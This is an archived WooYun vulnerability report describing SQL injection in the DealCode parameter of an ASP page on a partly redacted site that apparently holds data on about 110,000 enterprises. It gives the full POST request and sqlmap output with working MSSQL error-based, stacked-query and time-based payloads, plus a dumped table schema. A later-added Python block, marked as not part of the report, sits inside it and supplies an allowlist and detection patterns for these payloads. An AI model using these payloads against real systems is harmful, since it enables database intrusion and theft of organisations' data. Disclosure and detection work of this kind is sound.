WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
2015-12-07: Details reported to the vendor; awaiting vendor handling
2015-12-10: Vendor confirmed; details disclosed to the vendor only
2015-12-20: Details disclosed to core white hats and relevant domain experts
2015-12-30: Details disclosed to regular white hats
2016-01-09: Details disclosed to intern white hats
2016-01-23: Details disclosed to the public
As the title says.
Vulnerable endpoint:
POST /dm/printview_X.asp HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Content-Length: 35
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/dm/deal_X.asp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASPSESSIONIDCSTAQCCT=KCEKKDABHPDIFKJIPOABOJAE

DealCode=121213*&Submit=%CC%E1%BD%BB
The DealCode parameter is injectable through several techniques (sqlmap output follows):
---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: DealCode=121213' AND 6034=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(112)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (6034=6034) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(118)+CHAR(113))) AND 'zhKC'='zhKC&Submit=%CC%E1%BD%BB

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: DealCode=121213';WAITFOR DELAY '0:0:5'--&Submit=%CC%E1%BD%BB

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (comment)
    Payload: DealCode=121213' WAITFOR DELAY '0:0:5'--&Submit=%CC%E1%BD%BB
---
[22:13:54] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000
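As an added example that is not part of the original report, the Python below takes the three payload shapes sqlmap listed above and shows the two things a defender wants from them: the server-side allowlist that printview_X.asp should have applied to DealCode before building any query (assumed here to be digits only, based on the sample value 121213), and signatures a WAF rule or log review could use to flag each technique. The GBK form charset and the sample bodies are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, urlencode

# Signatures for the payload shapes sqlmap reported against DealCode; the list
# order fixes the order of names in classify()'s result.
SIGNATURES = [
    ("error-based-convert", re.compile(r"CONVERT\s*\(\s*INT\s*,\s*\(\s*SELECT", re.I)),
    ("quote-tautology", re.compile(r"\bAND\s+'[^']*'\s*=\s*'", re.I)),
    ("stacked-query", re.compile(r";\s*(WAITFOR|SELECT|EXEC|INSERT|UPDATE|DELETE|DROP)\b", re.I)),
    ("time-delay", re.compile(r"WAITFOR\s+DELAY", re.I)),
]

# Assumption: a legitimate DealCode is a short run of digits, as in the report's
# sample value 121213. Adjust to the real code format before relying on it.
DEAL_CODE_RE = re.compile(r"^\d{1,20}$")


def form_body(deal_code):
    """Encode the form the way the browser in the report does (GBK charset, assumed)."""
    return urlencode({"DealCode": deal_code, "Submit": "提交"}, encoding="gbk")


# Constructed samples: one benign submission plus the three payloads from the report.
SAMPLE_BODIES = {
    "benign": form_body("121213"),
    "error_based": form_body(
        "121213' AND 6034=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(112)+CHAR(120)"
        "+CHAR(113)+(SELECT (CASE WHEN (6034=6034) THEN CHAR(49) ELSE CHAR(48) END))"
        "+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(118)+CHAR(113))) AND 'zhKC'='zhKC"),
    "stacked": form_body("121213';WAITFOR DELAY '0:0:5'--"),
    "time_blind": form_body("121213' WAITFOR DELAY '0:0:5'--"),
}


def classify(body):
    """Parse a printview_X.asp POST body; report the decoded DealCode, whether it
    passes the allowlist (what the server must enforce before touching the DB),
    and which injection signatures matched (what a WAF or log review would flag)."""
    fields = parse_qs(body, encoding="gbk", errors="replace")
    deal_code = fields.get("DealCode", [""])[0]
    matched = [name for name, rx in SIGNATURES if rx.search(deal_code)]
    return {
        "deal_code": deal_code,
        "allowed": bool(DEAL_CODE_RE.match(deal_code)),
        "signatures": matched,
    }


if __name__ == "__main__":
    for label, body in SAMPLE_BODIES.items():
        print(label, classify(body))
```

Note that the allowlist alone rejects every payload, while the signatures only tell you which technique was attempted; parameterised queries plus the allowlist are the fix, the signatures are for detection.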
[sqlmap table and row-count listing for the databases tempdb, webcodecheck, CodeNianJian, msdb, codechk, master, webcode and thams omitted]

Database: CodeNianJian
Table: Deal
[11 columns]
+-------------+----------+
| Column      | Type     |
+-------------+----------+
| ApplyTime   | datetime |
| AuditTime   | datetime |
| DealCode    | varchar  |
| DealDoc     | varchar  |
| DealStatus  | int      |
| Decision    | int      |
| ID          | int      |
| jgdm        | varchar  |
| UserName    | varchar  |
| UserSection | varchar  |
| Zt          | varchar  |
+-------------+----------+
It holds information on about 110,000 enterprises.
Two rows dumped at random as proof:
Severity: High
Vulnerability Rank: 10
Confirmed: 2015-12-10 17:58
CNVD confirmed and reproduced the reported issue; it has been passed to CNCERT, which forwarded it to the Xinjiang branch centre to coordinate remediation with the organisation operating the website.
None yet.